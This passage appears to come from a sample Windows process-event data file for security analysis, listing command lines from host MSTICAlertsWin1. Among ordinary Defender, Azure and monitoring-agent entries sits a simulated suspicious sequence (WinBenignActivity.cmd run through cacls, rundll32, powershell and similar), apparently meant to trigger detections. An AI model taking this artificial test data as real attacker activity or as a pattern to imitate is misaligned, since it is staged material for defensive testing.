(x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /ua /installsource scheduler\",\"C:\\\\Windows\\\\System32\\\\cmd.exe /c c:\\\\diagnostics\\\\WinBenignActivity.cmd 1 200\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 21 \",\"reg  c:\\\\diagnostics\\\\WinBenignActivity.cmd -5279 /30391\",\"ping  127.0.0.1 -n 21 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 30 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd -17541\",\"ping  127.0.0.1 -n 25 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cacls  c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 23 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -10858 \",\"ping  127.0.0.1 -n 26 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 14 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 5 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 1 \",\"rundll32  \\\\3567\\\\28584.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c \\\"\\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" c:\\\\diagnostics\\\\WinBenignActivity.cmd -30051 c:\\\\temp\\\\10517\\\\32030.ps1\\\"\",\"cmd  /c echo Any questions about the commands executed here then please contact one of\",\"cmd  /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; shainw@microsoft.com\",\"ping  127.0.0.1 -n 15 \",\"reg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -25563 /10689\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -4674\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cacls  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -12105 \",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"rundll32  \\\\17279\\\\3548.exe\",\"ping  127.0.0.1 -n 15 \",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -22572 c:\\\\temp\\\\10720\\\\13334.ps1\",\"ping  127.0.0.1 -n 15 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 15 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 2 \",\"svchost  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 2 \",\"netcfg  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"ping  127.0.0.1 -n 9 \",\"cscript  c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd c:\\\\diagnostics\\\\WinBenignActivity.cmd\",\"nan\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\WmiApSrv.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\svchost.exe -k wsappx\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"\\\"C:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\\\" /svc\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"C:\\\\Windows\\\\system32\\\\sppsvc.exe\",\"nan\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\localhost.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"powershell  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" -787 c:\\\\temp\\\\15711\\\\13331.ps1\",\"ping  127.0.0.1 -n 18 \",\"svchost  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"netcfg  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"ping  127.0.0.1 -n 18 \",\"cscript  \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\" \\\"C:\\\\diagnostics\\\\WinBenignActivity.cmd\\\"\",\"nan\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\WindowsAzure\\\\SecAgent\\\\WaSecAgentProv.exe\\\" -startPoll C:\\\\WindowsAzure\\\\Logs\\\\ 168.63.129.16 5248000 900000 21600000\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"CollectGuestLogs.exe\\\" -Mode:ga -FileName:C:\\\\WindowsAzure\\\\CollectGuestLogsTemp\\\\710dc858-9c96-4df5-bd9b-e932e7433077.zip\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"cmd\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"nan\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe\\\" /q WD\",\"C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\90875AAA-9256-468E-A6B3-041D325C6594\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1240.0 /program C:\\\\Windows\\\\SERVIC~2\\\\NETWOR~1\\\\AppData\\\\Local\\\\Temp\\\\mpam-d3ea18d4.exe /q WD\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignatureUpdate -ScheduleJob -RestrictPrivileges -Reinvoke\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SignaturesUpdateService -ScheduleJob -UnmanagedUpdate\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" GetDeviceTicket -AccessKey 71EBA1DC-4B6E-DCAE-B047-570DC49235AF \",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\platform\\\\4.18.1812.3-0\\\\MpCmdRun.exe\\\" SpyNetService -RestrictPrivileges -AccessKey AB4A7F64-6DA7-5DB5-6481-327860FAE09C -Reinvoke\",\"nan\",\"wmiadap.exe /D /T\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"6368\\\" \\\"6636\\\" \\\"6380\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \",\"\\\"C:\\\\Windows\\\\system32\\\\wuauclt.exe\\\" /RunHandlerComServer\",\"\\\"C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe\\\" WD /q\",\"C:\\\\Windows\\\\system32\\\\MpSigStub.exe /stub 1.1.15500.2 /payload 1.285.1230.0 /MpWUStub /program C:\\\\Windows\\\\SoftwareDistribution\\\\Download\\\\Install\\\\AM_Delta.exe WD /q\",\"\\\"C:\\\\Windows\\\\system32\\\\wermgr.exe\\\" \\\"-outproc\\\" \\\"0\\\" \\\"2796\\\" \\\"3216\\\" \\\"6432\\\" \\\"6404\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \\\"0\\\" \"],\"Computer\":[\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"MSTICAlertsWin1\",\"